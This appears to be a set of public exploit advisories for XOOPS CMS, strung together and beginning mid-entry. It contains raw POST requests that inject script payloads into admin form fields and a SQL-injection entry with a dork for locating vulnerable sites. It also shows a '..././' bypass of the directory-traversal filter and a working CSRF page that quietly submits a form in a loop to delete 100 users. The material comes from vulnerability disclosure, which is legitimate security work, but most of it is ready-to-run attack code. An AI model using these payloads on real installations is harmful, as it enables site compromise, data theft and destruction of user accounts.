[/REQUEST]
Parameter: newname[]
[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System"><script>alert(1)</script>
[/REQUEST]
Parameter: oldname[]
[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af;
xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100
op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System"><script>alert(1)</script>1bf8581e3dc&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]
[+] Sql Injection on XOOPS CMS v.2.5.9
[+] Date: 12/05/2019
[+] Risk: High
[+] CWE Number : CWE-89
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: https://xoops.org/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Gnu/Linux
[+] Dork: inurl:gerar_pdf.php inurl:modules // use your brain ;)
[+] Exploit :
http://host/patch/modules/patch/gerar_pdf.php?cid= [SQL Injection]
[+] EOF
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/XOOPS-DIRECTORY-TRAVERSAL.txt
Vendor:
=============
xoops.org
Product:
================
Xoops 2.5.7.2
Vulnerability Type:
===========================
Directory Traversal Bypass
Vulnerability Details:
=====================
Xoops 2.5.7.2 has checks to defend against directory traversal attacks.
However, they can be easily bypassed by simply issuing "..././" instead of
"../"
References:
http://xoops.org/modules/news/article.php?storyid=6757
Exploit Codes:
==============
In Xoops code in 'protector.php' the following check is made for dot dot
slash "../" in HTTP requests
/////////////////////////////////////////////////////////////////////////////////
if( is_array( $_GET[ $key ] ) ) continue ;
if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) )
{
$this->last_error_type = 'DirTraversal' ;
$this->message .= "Directory Traversal '$val' found.\n" ;
////////////////////////////////////////////////////////////////////////////////
The above Xoops directory traversal check can be defeated by using
..././..././..././..././
you can test the theory by using example below test case by supplying
..././ to GET param.
$val=$_GET['c'];
if ( substr( trim( $val ) , 0 , 3 ) == '../' || strstr( $val , '../../' ) )
{
echo "traversal!";
}else{
echo "ok!" . $val;
}
Disclosure Date:
==================================
Feb 2, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure
==================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere. (c) hyp3rlinx.
<!--
[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/XOOPS-CSRF.txt
Vendor:
=============
xoops.org
Product:
================
Xoops 2.5.7.2
Vulnerability Type:
===================================
CSRF - Arbitrary User Deletions
Vulnerability Details:
=====================
Xoops 2.5.7.2 has CSRF vulnerability where remote attackers can delete ALL
users from the Xoops database.
References:
http://xoops.org/modules/news/article.php?storyid=6757
Exploit Codes:
=============
Following CSRF attack delete all users from database, following POC code
will sequentially delete 100 users from the Xoops application.
-->
<iframe name="ifrm" style="display:none" name="hidden-form"></iframe>
<form target="ifrm" name='memberslist' id='CSRF' action='
http://localhost/xoops-2.5.7.2/htdocs/modules/system/admin.php?fct=users'
method='POST'>
<input type="hidden" id="ids" name="memberslist_id[]" />
<input type="hidden" name="fct" value="users" />
<input type="hidden" name="edit_group" value="" />
<input type="hidden" name="selgroups" value="" />
<input type="hidden" name="op" value="users_add_delete_group" />
<input type="hidden" name="op" value="action_group" />
<input type="hidden" name="Submit" value="Submit+Query" />
</form>
<script>
var c=-1
var amttodelete=100
var id=document.getElementById("ids")
var frm=document.getElementById("CSRF")
function doit(){
c++
arguments[1].value=c
arguments[0].submit()
if(c>=amttodelete){
clearInterval(si)
alert("Done!")
}
}
var si=setInterval(doit, 1000, frm, id)
</script>
<!--
Disclosure Date:
==================================
Jan 29, 2016: Vendor Notification
Vendor confirms and patches Xoops
March 17, 2016 : Public Disclosure
=================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere. (c) hyp3rlinx.
-->